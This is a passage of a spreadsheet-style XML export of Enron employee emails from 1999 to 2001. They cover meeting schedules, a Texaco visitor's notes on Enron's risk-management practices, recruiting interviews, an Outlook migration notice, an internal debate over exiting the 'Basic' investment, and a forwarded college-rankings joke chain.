    <t>Re-confirmation that the EES Power Weekly Meeting will be held today (only) @ 12 noon (CDT)._x000D_
_x000D_
Thank you_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Brooks, Loretta  _x000D_
Sent:	Thursday, October 04, 2001 3:04 PM_x000D_
To:	Black, Don; Presto, Kevin M.; Herndon, Rogers; Belden, Tim; Richter, Jeff; Dayao, Anthony; Pagan, Ozzie_x000D_
Subject:	EES Power Weekly Mtg._x000D_
_x000D_
Please note for Thursday, October 18 (ONLY) the EES Power Weekly Meeting will be held from 12:00-1:00 pm(CDT)  instead of 4:00 pm. The location will remain the same (EB3308)._x000D_
For those of you located in Portland we will call you at 10:00 am (PST)._x000D_
_x000D_
On Thursday, October 25 the meeting will resume its regular scheduled time._x000D_
_x000D_
Thank you _x000D_
Loretta Brooks</t>
  </si>
  <si>
    <t>Tue, 25 Apr 2000 03:22:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>RE: Houston visit</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Vince J Kaminski/HOU/ECT on 04/25/2000 _x000D_
10:24 AM ---------------------------_x000D_
_x000D_
_x000D_
"Faiz, Soussan" &lt;faizs@texaco.com&gt; on 04/25/2000 09:29:34 AM_x000D_
To: "'Vince.J.Kaminski@enron.com'" &lt;Vince.J.Kaminski@enron.com&gt;_x000D_
cc:  _x000D_
Subject: RE: Houston visit_x000D_
_x000D_
_x000D_
Dear Vince,_x000D_
_x000D_
Firstly, I really appreciate your time and our meeting last week.  Learning_x000D_
about Enron's use of leading-edge practices was quite enlightening and I_x000D_
truly benefited from our visit._x000D_
_x000D_
Secondly, I've summarized my key "take-aways" as stated below.  Before_x000D_
conveying it to my management, however, I really appreciate it if you can_x000D_
pls review my conclusions and ensure that they are not miss-stated._x000D_
_x000D_
Again, thanks so much for your time and wisdom.  I was also honored that you_x000D_
gave me a copy of the "Managing Energy Price Risk" book and shall reference_x000D_
it with interest.  THANK YOU._x000D_
_x000D_
I really look forward to seeing you again next time I'm in Houston._x000D_
_x000D_
Best regards,_x000D_
Soussan_x000D_
(914) 253-4187_x000D_
_x000D_
PS.  The latest Fortune article on ENE is a great read and substantiates the_x000D_
company's innovative and creative approach to business._x000D_
----------------------------------------------------------------------------_x000D_
----------------------------------------------------------------------------_x000D_
------_x000D_
As you may know, I was invited to visit with Enron (ENE) last week.  I met_x000D_
with Vince Kaminski, the VP and head of research in the risk management_x000D_
group of ENE.  Vince who used to be with Salomon Brothers and AT&amp;T is the_x000D_
"brain" of ENE w.r.t. their analytical tools for pricing of commodities,_x000D_
hedging, optimization of financial and physical transactions, as well as the_x000D_
value-at-risk systems.  In addition, Vince has received the 1999 James H._x000D_
McGraw Award for Energy Risk Management (Energy Risk Manager of the Year)_x000D_
and is well published.  He is the key contributor to a best-selling_x000D_
publication by Risk Books entitled: Managing Energy Price Risk._x000D_
_x000D_
Our meeting was mainly focused on gaining additional insights re_x000D_
leading-edge practices within ENE.  My key findings are summarized below:_x000D_
_x000D_
1. ENE does not use corporate price premises.  They use market price info_x000D_
only and adhere to mark-to-market accounting._x000D_
2. ENE uses the "Heath, Jarrow, and Morton" methods for modeling price_x000D_
dynamics (I've asked BIC for a copy of the associated paper).  They have_x000D_
their own "home-grown" software, however, they periodically review selected_x000D_
external developments for internal inclusion and advancement._x000D_
3. Vince's group comprises of Mathematicians, Physicists, and Operations_x000D_
Researchers who are responsible for the development and advancement of ENE's_x000D_
risk management tools.  These models are religiously used by the traders,_x000D_
risk managers, and BUs across ENE._x000D_
4. Investment proposals are screened, risked, and "ROVed" by a separate_x000D_
corporate group (similar to our Special Studies and with business and real_x000D_
options skills) who work in conjunction with the BUs.  All evaluations and_x000D_
transactions are marked-to-market._x000D_
5. ENE does not use efficient-frontier portfolio concepts.  They "VC fund"_x000D_
any opportunity that has a credible value proposition and can stand on its_x000D_
own.  They believe that with the current plentiful liquidity in the market,_x000D_
project-financing in not an issue for a "good" opportunity.  However, they_x000D_
closely monitor the development of each opportunity, within their deep_x000D_
portfolio, at the corporate level and know how to "fail fast"._x000D_
6. The employee reward system is based on P&amp;Ls as well as the creation of_x000D_
new business._x000D_
7. Most employees have stock options._x000D_
_x000D_
I really enjoyed my visit and hope to meet with Vince again the next time_x000D_
I'm in Houston._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 28 Nov 2000 00:01:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: Telephone Interview with the Enron Research Group</t>
  </si>
  <si>
    <t xml:space="preserve">Hi Christine!_x000D_
_x000D_
Thanks for being so prompt!  _x000D_
_x000D_
I have scheduled the telephone interview for 2:00 PM on Thursday, _x000D_
November 30th.  They will call you at (504) 861-9110.  If this is not_x000D_
the telephone number that you wish to be contacted at, please let me _x000D_
know the number that you do want them to call you on._x000D_
_x000D_
The Research Group does sponsor green cards and visas.  Below is_x000D_
a short synopsis of what the Research group does.  However, they will_x000D_
be glad to answer any questions you have during the interview. _x000D_
_x000D_
"The Enron Research Group is responsible for option modeling, building_x000D_
systems for risk quantification and management, development of_x000D_
optimization systems, help with statistical analysis and anything that _x000D_
requires_x000D_
advanced math".  The Research Group supports all units of Enron._x000D_
_x000D_
If you have any other questions, please feel free to contact me, or feel_x000D_
free to ask during the interview._x000D_
_x000D_
Talk to you on Thursday!_x000D_
_x000D_
Best regards,_x000D_
_x000D_
Shirley Crenshaw_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
"Qing Chen" &lt;qchen1@tulane.edu&gt; on 11/27/2000 05:40:09 PM_x000D_
To: &lt;Shirley.Crenshaw@enron.com&gt;_x000D_
cc:  _x000D_
Subject: Re: Telephone Interview with the Enron Research Group_x000D_
_x000D_
_x000D_
Hi Shirley,_x000D_
_x000D_
Thanks for the arrangement. I am available to start the interview:_x000D_
_x000D_
- from 9am to 10am on Wednesday and Thursday_x000D_
- from 2:30pm to 4pm on Thursday_x000D_
_x000D_
New Orleans is in the Central Time zone._x000D_
_x000D_
In addition, could you let me know:_x000D_
_x000D_
- what is the main responsibilities of the Research group;_x000D_
- what positions you are recruiting for; and_x000D_
- what qualifications and skill sets are critical to these positions._x000D_
_x000D_
Thanks. I look forward to hearing from you._x000D_
_x000D_
Best Regards,_x000D_
_x000D_
Qing (Christine) Chen_x000D_
MBA 2001_x000D_
A.B. Freeman School of Business_x000D_
Tulane University_x000D_
Tel: (504) 861-9110_x000D_
e-mail: qchen1@tulane.edu_x000D_
_x000D_
----- Original Message -----_x000D_
From: &lt;Shirley.Crenshaw@enron.com&gt;_x000D_
To: &lt;qchen1@tulane.edu&gt;_x000D_
Sent: Monday, November 27, 2000 10:25 AM_x000D_
Subject: Telephone Interview with the Enron Research Group_x000D_
_x000D_
_x000D_
&gt; Good morning Ms. Chen:_x000D_
&gt;_x000D_
&gt; Vince Kaminski and several members of the Research Group would like_x000D_
&gt; to conduct a telephone interview with you sometime this week at your_x000D_
&gt; convenience.  Please let me know the times that you are available and_x000D_
&gt; they will contact you._x000D_
&gt;_x000D_
&gt; The telephone interviews usually last approximately 1 hour and will be_x000D_
&gt; conducted via a speaker phone._x000D_
&gt;_x000D_
&gt; The Interviewers will be:_x000D_
&gt;_x000D_
&gt; Vince Kaminski      Managing Director and Head of Research_x000D_
&gt; Stinson Gibner      Vice President, Research_x000D_
&gt; Tanya Tamarchenko   Director, Research_x000D_
&gt; Zimin Lu       Director, Research_x000D_
&gt;_x000D_
&gt; Look forward to hearing from you._x000D_
&gt;_x000D_
&gt; Best regards,_x000D_
&gt;_x000D_
&gt;_x000D_
&gt; Shirley Crenshaw_x000D_
&gt; Administrative Coordinator_x000D_
&gt; Enron Research Group_x000D_
&gt;_x000D_
&gt;_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 27 Jul 2000 01:12:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>i am probably going to go to woody's</t>
  </si>
  <si>
    <t>Tue, 15 Aug 2000 04:46:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>LOU Language</t>
  </si>
  <si>
    <t xml:space="preserve">Mark,  Attached are the latest revisions to the participation language.  _x000D_
Please review and if everything looks acceptable, forward to NBP._x000D_
</t>
  </si>
  <si>
    <t>Wed, 29 Nov 2000 07:38:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Calendar of VP MD Committee Members and Meeting Assignments</t>
  </si>
  <si>
    <t xml:space="preserve">Steve,_x000D_
_x000D_
Also as you requested.  We'll keep you updated with any/al changes as they _x000D_
occur.  _x000D_
_x000D_
Gina_x000D_
</t>
  </si>
  <si>
    <t>Sun, 5 Nov 2000 11:44:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'dan703@home.com'})</t>
  </si>
  <si>
    <t>Re: trading opportunity</t>
  </si>
  <si>
    <t>Dear Dan,_x000D_
_x000D_
Thank you for contacting me, but I am quite content with my current _x000D_
opportunities at Enron.  Thank you so much for your interest.  _x000D_
_x000D_
Sincerely,_x000D_
Mike Grigsby_x000D_
Director of Trading</t>
  </si>
  <si>
    <t>Thu, 7 Jun 2001 04:04:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>1-URGENT - Outlook Email Notification (new)</t>
  </si>
  <si>
    <t xml:space="preserve">OUTLOOK EMAIL NOTIFICATION_x000D_
_x000D_
Your Date of Migration is: Monday, June 11th_x000D_
_x000D_
YOU WILL BE UNABLE TO SEND E-MAIL unless you take the following action:_x000D_
Please go through your Notes email and clean out as many old/un-needed emai=_x000D_
l=20_x000D_
items as possible BEFORE your date of migration.? After you are migrated to=_x000D_
=20_x000D_
Outlook you will only be allocated 100MB of total Mailbox space.?? If more=_x000D_
=20_x000D_
than this amount of data is migrated to Outlook YOU WILL NOT BE ABLE TO SEN=_x000D_
D=20_x000D_
E-MAIL until it is below the 100MB limit.? Cleaning up your Notes email now=_x000D_
=20_x000D_
will prevent this from happening to YOU._x000D_
_x000D_
Enron=01,s messaging platform is migrating from Lotus Notes to Microsoft Ou=_x000D_
tlook=20_x000D_
2000 worldwide.  You will be accessing Outlook for all of your email=20_x000D_
functions.=20_x000D_
_x000D_
WHY IS ENRON MIGRATING TO OUTLOOK 2000?_x000D_
_x000D_
Many factors contributed to the decision to migrate from Lotus Notes to=20_x000D_
Microsoft Exchange/Outlook.  The most prominent factors were:_x000D_
_x000D_
? Significant advantages to moving to a product that is more integrated wit=_x000D_
h=20_x000D_
current Enron apps (Windows 2000, Office and Internet Explorer)_x000D_
? More efficient Shared PC and Roaming User features_x000D_
? Improved support and integration for Palm/CE devices_x000D_
? Instant Messaging capabilities_x000D_
_x000D_
WHAT IS BEING MIGRATED TO OUTLOOK 2000?_x000D_
_x000D_
? Email Messages.  From the date of your scheduled migration, the last (30)=_x000D_
=20_x000D_
thirty days of your Email will be converted for use in Outlook._x000D_
? All your folders in Notes you use to store email messages in._x000D_
? To Do Items_x000D_
? Journal Items_x000D_
? Calendar Entries dating from (1) one year in the past to (10) ten years i=_x000D_
n=20_x000D_
the future will be converted._x000D_
? Address Books, but NOT your Distribution Lists that you created.  You wil=_x000D_
l=20_x000D_
need to re-create these in Outlook._x000D_
_x000D_
Thank you,_x000D_
_x000D_
Outlook 2000 Migration Team_x000D_
</t>
  </si>
  <si>
    <t>Thu, 21 Dec 2000 02:48:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Shanner</t>
  </si>
  <si>
    <t>I have sent a Gas Purchase Agreement as requested to Jim Shanner for _x000D_
signature.  Are there any transactions which need to be confirmed under the _x000D_
new agreement??  _x000D_
_x000D_
Mr. Shanner is curious as to price etc.  Could you contact him regarding this _x000D_
issue and let me know._x000D_
_x000D_
Thanks!_x000D_
Debra Perlingiere_x000D_
Enron North America Corp._x000D_
Legal Department_x000D_
1400 Smith Street, EB 3885_x000D_
Houston, Texas 77002_x000D_
dperlin@enron.com_x000D_
Phone 713-853-7658_x000D_
Fax  713-646-3490</t>
  </si>
  <si>
    <t>Tue, 10 Oct 2000 02:52:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'richard.lydecker@enron.com'})</t>
  </si>
  <si>
    <t>Re: Basic</t>
  </si>
  <si>
    <t xml:space="preserve">Dick, you are doing the right things - if you run into timing issues in the _x000D_
future do not hesitate to give me a call directly._x000D_
_x000D_
Regards_x000D_
Delainey_x000D_
---------------------- Forwarded by David W Delainey/HOU/ECT on 10/10/2000 _x000D_
09:51 AM ---------------------------_x000D_
_x000D_
_x000D_
Richard Lydecker@ENRON_x000D_
10/09/2000 04:27 PM_x000D_
To: David W Delainey/HOU/ECT@ECT_x000D_
cc: Jeff Donahue/HOU/ECT@ECT, Raymond Bowen/HOU/ECT@ECT _x000D_
Subject: Re: Basic  _x000D_
_x000D_
Dave, I agree with your perspective on this.  Building another theoretical _x000D_
model in the Basic situation seems naive to me.  This company is and has been _x000D_
in a financial death spiral.  For months, all involved on the ENA side have _x000D_
been focused on a probability that the Basic situation would result in a _x000D_
writeoff of a very significant piece of the Merlin debt and nothing for the _x000D_
equity.  The deal we are working on is at the high end of the projections _x000D_
reviewed with the rating agencies on recovery for the Merlin debt and _x000D_
actually gets us at least some chance of recovery on our equity._x000D_
_x000D_
I do not agree that no effort has been made to market the company.  As you _x000D_
recall, we worked very intensively in trying to support an IPO which would _x000D_
take out the debt.  Despite many attempts to structure a successful offering _x000D_
(and a series of difficult concessions by Enron), the IB finally pulled it.  _x000D_
The S-1, by the way, was about the ugliest I have ever seen._x000D_
_x000D_
We carefully evaluated seeking an industry purchaser.  Our conclusion was _x000D_
that this risked losing significant value, would require a good deal of time, _x000D_
and had virtually no likelihood of equalling the recovery we have would _x000D_
achieve if we can do the deal on the table.   This evaluation was reinforced _x000D_
with the contacts we have had with industry players._x000D_
_x000D_
In any liquidation there is always the possibility that another path could _x000D_
possibility capture more value.  In this case especially, I think we have a _x000D_
very good idea of reality and are making an uniformed decision to recommend a _x000D_
better-than-exected exit.  This is not a firesale._x000D_
_x000D_
We will continue to work constructively with RAC in a non-confrontational _x000D_
mode on Basic.  Be assured, however, that if I feel there is a real risk of _x000D_
process getting in the way of achieving our objectives, I will raise a red _x000D_
flag.  Dick._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
David W Delainey@ECT_x000D_
09/29/2000 11:34 AM_x000D_
To: Rick Buy/HOU/ECT@ECT_x000D_
cc: David Gorte/HOU/ECT@ECT, Jeff Donahue/HOU/ECT@ECT, Richard _x000D_
Lydecker/Corp/Enron@Enron, Raymond Bowen/HOU/ECT@ECT _x000D_
_x000D_
Subject: Re: Basic_x000D_
_x000D_
Rick, I disagree - the DASH had an implication unsubstantiated that the _x000D_
current deal on the table is a bad one.  I believe that RAC should provide a _x000D_
clear opinion or say directly that the analysis is deficient._x000D_
_x000D_
It is too easy to state the obvious._x000D_
_x000D_
Regards_x000D_
Delainey_x000D_
---------------------- Forwarded by David W Delainey/HOU/ECT on 09/29/2000 _x000D_
11:17 AM ---------------------------_x000D_
From: Rick Buy on 09/29/2000 10:18 AM_x000D_
To: David W Delainey/HOU/ECT@ECT_x000D_
cc: David Gorte/HOU/ECT@ECT, Jeff Donahue/HOU/ECT@ECT, Richard _x000D_
Lydecker/Corp/Enron@Enron, Raymond Bowen/HOU/ECT@ECT _x000D_
Subject: Re: Basic  _x000D_
_x000D_
In my opion this DASH did exactly what it was supposed to do - prompt a _x000D_
dialog on whether we are getting an adequate price for this asset. My _x000D_
understanding is that no model was built to value an alternative nor was _x000D_
there any effort to market the company. If we want to "take the money and _x000D_
run" (whhich in this case is probably the right decision) fine, but we should _x000D_
know what we are leaving behind, especially given the current commodity price _x000D_
environment.  Rick_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 5 Dec 2000 08:18:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'gjack3@hotmail.com'})</t>
  </si>
  <si>
    <t>Hi Grace-_x000D_
_x000D_
Kevin asked me to let you know that he spoke to Kim ?(Causey)? with KSBJ _x000D_
radio station.  She said that they (Kim Causey herself, the Program Mgr.) _x000D_
would MC for us for $150.00.  This is what they will need from us... _x000D_
_x000D_
A confirmation letter on church letterhead of the date, time, location and _x000D_
any special way the MC will be used; 7 days prior to the event with $150.00 _x000D_
check or money order mailed or hand delivered to.._x000D_
Attn: Charlotte Estrada _x000D_
327 Wilson Road_x000D_
Humble, TX 77338_x000D_
_x000D_
Please include the name of a contact person that Kim will need when she gets _x000D_
to the event.</t>
  </si>
  <si>
    <t>Mon, 11 Jun 2001 11:23:50 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'john.lavorato@enron.com', 'tim.belden@enron.com'})</t>
  </si>
  <si>
    <t>Wednesday doesn't work for me.   _x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Lavorato, John  _x000D_
Sent:	Monday, June 11, 2001 1:20 PM_x000D_
To:	Belden, Tim; Presto, Kevin M._x000D_
Subject:	RE: _x000D_
_x000D_
How about Tuesday's at 3:30 Houston time._x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Belden, Tim  _x000D_
Sent:	Monday, June 11, 2001 1:02 PM_x000D_
To:	Lavorato, John; Presto, Kevin M._x000D_
Subject:	RE: _x000D_
_x000D_
i completely agree._x000D_
 -----Original Message-----_x000D_
From: 	Lavorato, John  _x000D_
Sent:	Monday, June 11, 2001 6:42 AM_x000D_
To:	Belden, Tim; Presto, Kevin M._x000D_
Subject:	_x000D_
_x000D_
I would like to have a meeting once a week for 1-2 hours with all 6 of us just to make sure we are moving forward and to get an update and anything and everything.  My only concern is that we take the boys away from their overwhelming task.  What do you guys think._x000D_
_x000D_
John</t>
  </si>
  <si>
    <t>Tue, 5 Dec 2000 04:14:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Expense Check</t>
  </si>
  <si>
    <t>Mark,_x000D_
_x000D_
Your expense check was cut on 11/20, so should be arriving in this office _x000D_
today or tomorrow.  Houston A/P said to allow 10 working days.  I'll keep a _x000D_
lookout for the check and notify you as soon as it arrives._x000D_
_x000D_
Kathy</t>
  </si>
  <si>
    <t>Fri, 28 Sep 2001 08:13:05 -0700 (PDT)</t>
  </si>
  <si>
    <t>Jim Schwieger's Review</t>
  </si>
  <si>
    <t>Jeanie,_x000D_
_x000D_
Can you send me Jim's evaluation form so I can write his midyear review?  John was out today so I did not get to ask about feedback on Jim._x000D_
_x000D_
Tom</t>
  </si>
  <si>
    <t>Thu, 10 Aug 2000 07:53:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'chris.williams@enron.com'})</t>
  </si>
  <si>
    <t>Re: Resume-Jeff Andrews</t>
  </si>
  <si>
    <t xml:space="preserve">Chris,_x000D_
_x000D_
My evaluation form for Jeff._x000D_
_x000D_
Vince_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
   _x000D_
	Enron North America Corp._x000D_
	_x000D_
	From:  Chris Williams                           08/09/2000 09:55 AM_x000D_
	_x000D_
_x000D_
To: Vince J Kaminski/HOU/ECT@ECT_x000D_
cc: Shirley Crenshaw/HOU/ECT@ECT _x000D_
Subject: Resume-Jeff Andrews_x000D_
_x000D_
Vince,_x000D_
Attached is the evaluation form and resume for your interview w/ Jeff Andrews _x000D_
this afternoon at 5pm.  I will bring him to your office at that time._x000D_
Jeff is interviewing for a research position within the coal group.  Please _x000D_
feel free to contact if there are any questions._x000D_
Thanks_x000D_
_x000D_
Chris Williams_x000D_
ENA Staffing_x000D_
x39866_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 15 Dec 1999 08:51:00 -0800 (PST)</t>
  </si>
  <si>
    <t>A$M and its "second tier" status</t>
  </si>
  <si>
    <t xml:space="preserve">Thought you might like this._x000D_
_x000D_
-e_x000D_
---------------------- Forwarded by Eric Bass/HOU/ECT on 12/15/99 04:50 PM _x000D_
---------------------------_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Ami Chokshi @ ENRON                           12/15/99 04:06 PM_x000D_
	_x000D_
_x000D_
To: Eric Bass/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: A$M and its "second tier" status_x000D_
_x000D_
_x000D_
---------------------- Forwarded by Ami Chokshi/Corp/Enron on 12/15/99 04:05 _x000D_
PM ---------------------------_x000D_
_x000D_
_x000D_
"Michael P. Lyons" &lt;mlyons@gwinnroby.com&gt; on 12/15/99 12:28:44 PM_x000D_
To: "William J. Murphy (E-mail)" &lt;bmurphy@velaw.com&gt;, _x000D_
Trinamaurer@worldnet.att.net, "Russell Berry" &lt;berryruss@aol.com&gt;, "Russell _x000D_
Berry" &lt;berry_russell@hotmail.com&gt;, "Rebecca Lemoine" &lt;rlemoi2@lsu.edu&gt;, _x000D_
michele_murphy@msn.com, "McDonald, James" _x000D_
&lt;James.McDonald@SouthernEnergy.Com&gt;, "Matt Chaney" &lt;mchaney@jandflaw.com&gt;, _x000D_
JROBERTS@BARONBUDD.COM, jdavis@brownsims.com, "Janice Hinshaw" _x000D_
&lt;jhinshaw@gwinnroby.com&gt;, "Heather E. Kitzman" &lt;hkitzman@cooperinst.org&gt;, _x000D_
"Gus David Oppermann V" &lt;gopperma@ricefowler.com&gt;, "Gary Joe Jimmy Joe Frank _x000D_
Billy Bob Jack (E-mail)" &lt;jacktxcpa@aol.com&gt;, dkelley@beacongrp.com, "Dan _x000D_
Vickers (E-mail)" &lt;warickco@flash.net&gt;, credd2002@aol.com, _x000D_
corbymaurer@worldnet.att.net, "Chris Miller (E-mail)" _x000D_
&lt;"chris_miller"@nextlink.net&gt;, chris_miller@nextlink.net, "Chris Edwards" _x000D_
&lt;rattlers@earthlink.net&gt;, "Chris Egan" &lt;cegan@mail.smu.edu&gt;, _x000D_
cheb75@yahoo.com, brian.s.mcclure@ac.com, "Ami Chokshi" _x000D_
&lt;achokshi99@yahoo.com&gt;, Ami Chokshi/Corp/Enron@ENRON_x000D_
cc:  _x000D_
_x000D_
Subject: A$M and its "second tier" status_x000D_
_x000D_
_x000D_
_x000D_
Hate to promote the obvious.  US News &amp; World Reports has their most current _x000D_
college rankings out, and, yes, Texas is in the top 50 schools in the _x000D_
country.  A$M in the meantime has returned to their fabled "second tier" _x000D_
status where all "second tier" schools belong.  I don't really care if Texas _x000D_
Monthly prints a huge front page article that says "UT....THE BEST SCHOOL IN _x000D_
TEXAS".....Of course Texas Monthly would never do that because IT ISN"T _x000D_
NEWS!!!!!!!   Tell us something we don't know!  You will recall that a couple _x000D_
of years ago, Texas Monthly reported that a$m was "the best school in Texas", _x000D_
relying on US NEWS &amp; WORLD REPORTS rankings.  I guess that was short lived._x000D_
_x000D_
http://www.usnews.com/usnews/edu/college/rankings/natunivs/natu_a.htm_x000D_
 - att1.htm_x000D_
 -  USNews - edu.url_x000D_
---------------------- Forwarded by Ami Chokshi/Corp/Enron on 12/15/99 04:05 _x000D_
PM ---------------------------_x000D_
_x000D_
_x000D_
"Michael P. Lyons" &lt;mlyons@gwinnroby.com&gt; on 12/15/99 12:40:09 PM_x000D_
To: "William J. Murphy (E-mail)" &lt;bmurphy@velaw.com&gt;, _x000D_
Trinamaurer@worldnet.att.net, "Russell Berry" &lt;berryruss@aol.com&gt;, "Russell _x000D_
Berry" &lt;berry_russell@hotmail.com&gt;, "Rebecca Lemoine" &lt;rlemoi2@lsu.edu&gt;, _x000D_
michele_murphy@msn.com, "Matt Chaney" &lt;mchaney@jandflaw.com&gt;, "McDonald, _x000D_
James" &lt;James.McDonald@SouthernEnergy.Com&gt;, "Kitzman, Heather" _x000D_
&lt;hkitzman@cooperinst.org&gt;, jdavis@brownsims.com, "Janice Hinshaw" _x000D_
&lt;jhinshaw@gwinnroby.com&gt;, "Gus David Oppermann V" &lt;gopperma@ricefowler.com&gt;, _x000D_
"Gary Joe Jim Bob Frank Billy Bob Jack" &lt;jacktxcpa@aol.com&gt;, _x000D_
dkelley@beacongrp.com, "Dan Vickers (E-mail)" &lt;warickco@flash.net&gt;, _x000D_
credd2002@aol.com, corbymaurer@worldnet.att.net, chris_miller@nextlink.net, _x000D_
"Chris Egan" &lt;cegan@mail.smu.edu&gt;, "Chris Edwards" &lt;rattlers@earthlink.net&gt;, _x000D_
"Cheb" &lt;cheb75@yahoo.com&gt;, brian.s.mcclure@ac.com, "Ami Chokshi" _x000D_
&lt;achokshi99@yahoo.com&gt;, Ami Chokshi/Corp/Enron@ENRON_x000D_
cc:  _x000D_
_x000D_
Subject: UT/a$m business school and engineering school comparisons_x000D_
_x000D_
_x000D_
_x000D_
Whoops.  Looks like a$m is STILL ranked considerably lower than Texas in both _x000D_
Business and Engineering, in spite of the fact that every agroid will tell _x000D_
you differently._x000D_
_x000D_
_x000D_
http://www.usnews.com/usnews/edu/college/rankings/cat13wi.htm_x000D_
http://www.usnews.com/usnews/edu/college/rankings/cat12spc.htm_x000D_
_x000D_
 - att1.htm_x000D_
---------------------- Forwarded by Ami Chokshi/Corp/Enron on 12/15/99 04:05 _x000D_
PM ---------------------------_x000D_
_x000D_
_x000D_
"Michael P. Lyons" &lt;mlyons@gwinnroby.com&gt; on 12/15/99 03:54:03 PM_x000D_
To: Trinamaurer@worldnet.att.net, "Russell Berry" &lt;berryruss@aol.com&gt;, _x000D_
"Russell Berry" &lt;berry_russell@hotmail.com&gt;, "Rebecca Lemoine" _x000D_
&lt;rlemoi2@lsu.edu&gt;, "Murphy, Billy" &lt;bmurphy@velaw.com&gt;, "Kitzman, Heather" _x000D_
&lt;hkitzman@cooperinst.org&gt;, "Jonathan Gansell" &lt;jgansell@gwinnroby.com&gt;, _x000D_
JROBERTS@BARONBUDD.COM, jdavis@brownsims.com, "Janice Hinshaw" _x000D_
&lt;jhinshaw@gwinnroby.com&gt;, James.McDonald@SouthernEnergy.Com, "Gus David _x000D_
Oppermann V" &lt;gopperma@ricefowler.com&gt;, "Gary Joe Jim Bob Frank Billy Bob _x000D_
Jack" &lt;jacktxcpa@aol.com&gt;, dkelley@beacongrp.com, "Dan Vickers \(E-mail\)" _x000D_
&lt;warickco@flash.net&gt;, credd2002@aol.com, corbymaurer@worldnet.att.net, _x000D_
chris_miller@nextlink.net, "Chris Miller \(E-mail\)" _x000D_
&lt;"chris_miller"@nextlink.net&gt;, "Chris Edwards" &lt;rattlers@earthlink.net&gt;, _x000D_
"Chris Egan" &lt;cegan@mail.smu.edu&gt;, cheb75@yahoo.com, brian.s.mcclure@ac.com, _x000D_
"Bobby McGehee" &lt;bmcgehee@gwinnroby.com&gt;, "Ami Chokshi" _x000D_
&lt;achokshi99@yahoo.com&gt;, Ami Chokshi/Corp/Enron@ENRON_x000D_
cc:  _x000D_
_x000D_
Subject: Fw: Big 12 Conference, University of Texas, Document 1629_108  _x000D_
Football Coach Comments &amp; Player Comments from Mon. Revision [108]_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
-----Original Message-----_x000D_
From: Teamlink &lt;support@pivotalcc.com&gt;_x000D_
Date: Wednesday, December 15, 1999 3:37 PM_x000D_
Subject: Big 12 Conference, University of Texas, Document 1629_108 Football_x000D_
Coach Comments &amp; Player Comments from Mon. Revision [108]_x000D_
_x000D_
_x000D_
&gt;====TeamLink Document Update====_x000D_
&gt;_x000D_
&gt;University of Texas Football Coach Comments &amp; Player Comments from Mon._x000D_
&gt;Revision [108] has just been updated by the Athletic Department and is_x000D_
&gt;attached to this email._x000D_
&gt;_x000D_
&gt;_x000D_
&gt;====Special TeamLink Offer====_x000D_
&gt;_x000D_
&gt;Longhorn Football fans, the 1999 season is almost over but you can_x000D_
&gt;relive all of the exciting action by ordering the Longhorn Video Season_x000D_
&gt;Ticket.  Call (512) 478-1833 to get your own piece of Longhorn history._x000D_
&gt;Mention Texas TeamLink and save 10%.  Perfect for the Orange blood on_x000D_
&gt;your Christmas list._x000D_
&gt;_x000D_
&gt;====Web Sites====_x000D_
&gt;_x000D_
&gt;Get more info at the official athletics site:_x000D_
&gt;http://www.texassports.com_x000D_
&gt;_x000D_
&gt;Be sure to check out official Longhorn merchandise at:_x000D_
&gt;http://www.coop-bookstore.com_x000D_
&gt;_x000D_
&gt;To modify what we send you go to:  http://www.texasteamlink.com_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;====Customer Support - 7 days a week, 10am-10pm EST====_x000D_
&gt;_x000D_
&gt;If you are unable to view the attached document or have other questions,_x000D_
&gt;please contact us:_x000D_
&gt;_x000D_
&gt;Toll Free: 1-800-599-9402_x000D_
&gt;Email:  mailto:support@pivotalcc.com_x000D_
&gt;_x000D_
&gt;Live Online Customer Service:  available at our website_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;====AOL Subscribers====_x000D_
&gt;_x000D_
&gt;Get more info at the official athletics site:  &lt;A_x000D_
&gt;HREF="http://www.texassports.com"&gt;Click Here&lt;/a&gt;_x000D_
&gt;_x000D_
&gt;Be sure to check out official Longhorn merchandise at:  &lt;A_x000D_
&gt;HREF="http://www.coop-bookstore.com"&gt;Click Here&lt;/a&gt;_x000D_
&gt;_x000D_
&gt;To modify what we send you go to:  &lt;A_x000D_
&gt;HREF="http://www.texasteamlink.com"&gt;Click Here&lt;/a&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;====First Time Users====_x000D_
&gt;_x000D_
&gt;You need Adobe Acrobat Reader to view these documents.  To download_x000D_
&gt;please go to our website._x000D_
&gt;_x000D_
&gt;_x000D_
_x000D_
 - 1629_108.PDF_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 20 Sep 2000 02:26:00 -0700 (PDT)</t>
  </si>
  <si>
